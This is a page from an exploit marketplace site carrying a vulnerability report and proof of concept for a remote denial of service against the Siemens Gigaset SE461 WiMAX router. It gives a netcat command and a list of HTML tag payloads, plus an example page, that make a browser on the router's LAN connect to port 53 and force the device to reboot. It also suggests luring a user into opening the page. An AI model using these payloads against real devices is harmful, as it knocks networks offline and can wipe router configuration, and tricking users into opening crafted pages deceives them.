[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

Gigaset SE461 WiMAX router Remote Denial of Service Vulns

Author
Benkei
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6782
Category
dos / poc
Date add
23-03-2009
Platform
hardware
=========================================================
Gigaset SE461 WiMAX router Remote Denial of Service Vulns
=========================================================



                     _   _ _____ _     ___ _____ _   _
                   / / / / ____/ /   /  _/_  __/ / / /
                  / /_/ / __/ / /    / /  / / / /_/ /
                 / __  / /___/ /____/ /  / / / __  /
                /_/ /_/_____/_____/___/ /_/ /_/ /_/
                           Helith - 0815
--------------------------------------------------------------------------------

Author		 : Benkei
Date		 : 2008-02-08
Vendor		 : Siemens
Affected product : Gigaset SE461 WiMAX router
Firmware version : 1.5-BL024.9.6401
		   Propably other firmware versions are affected as well
Type		 : Denial of Service




After establishing a tcp connection to the affected device on port 53 from the
LAN interface and after closing the connection the router will restart.

Sometimes when using the web trigger with Internet explorer the WAN
configuration (ip, gateway ip, dns servers) for the device was lost and a
hardware reset was needed in order to make the device usable again.   

This issue can be triggered from the LAN interface by direct connection or
by using specially crafted web content. For the web content to be able to
trigger the issue a browser withouth security restrictions on connection to
port 53 must be used, the tests done shows Internet Explorer like the only
one cappable of activating the bug.

Test made worked with Internet explorer version 7.0.6001.18000, it
didnt worked with Opera version 9.63 build 10476, Mozilla Firefox
version 3.0.1. nor Chrome 1.0.154.48. The html tags <img>, <link> an <base>
worked.


Steps to reproduce:

# direct connection
# nc -nvv 192.168.1.1 53

Or force someone into the lan segment of the router to open an html file
with one of the following tags and wait for the connection to be established
and closed. After 5 upon 10 seconds the device will reboot.

<+Tags which can get used+>
<img src="http://192.168.1.1:53" />
<img src="http://192.168.1.1:53/p.png" />
<a href="http://192.168.1.1:53">click me</a>
<link href="192.168.1.1:53" rel="stylesheet" type="text/css" />
<link href="192.168.1.1:53/p.css" rel="stylesheet" type="text/css" />
<div style="background-image:url(http://192.168.1.1:53)"></div>
<div style="background-image:url(http://192.168.1.1:53/p.png)"</div>
<object data="http://192.168.1.1:53" type="image/gif" ></object>
<object data="http://192.168.1.1:53/p.gif" type="image/gif" ></object>
<script src="http://192.168.1.1:53"></script>
<script src="http://192.168.1.1:53/p.js"></script>
<iframe src="http://192.168.1.1:53"></iframe>
<iframe src="http://192.168.1.1:53/p.html"></iframe>
<bgsound src="http://192.168.1.1:53"></bgsound>
<bgsound src="http://192.168.1.1:53/p.wav"></bgsound>
<head><base href="http://192.168.1.1:53/"></head>
<base href="http://192.168.1.1:53/" /></head>
<img src="p.jpg" />
<-End->

# example html file
# "p" is a fictional file to ensure that the browser requests something

<html>
    <head>
        <base href="https://192.168.2.1:53/" />
    </head>
    <body>
        <img src="p.jpg" />
        <img src="https://192.168.2.1:53/p.jpg" />
    </body>
</html>                              


 

#  0day.today [2024-11-15]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team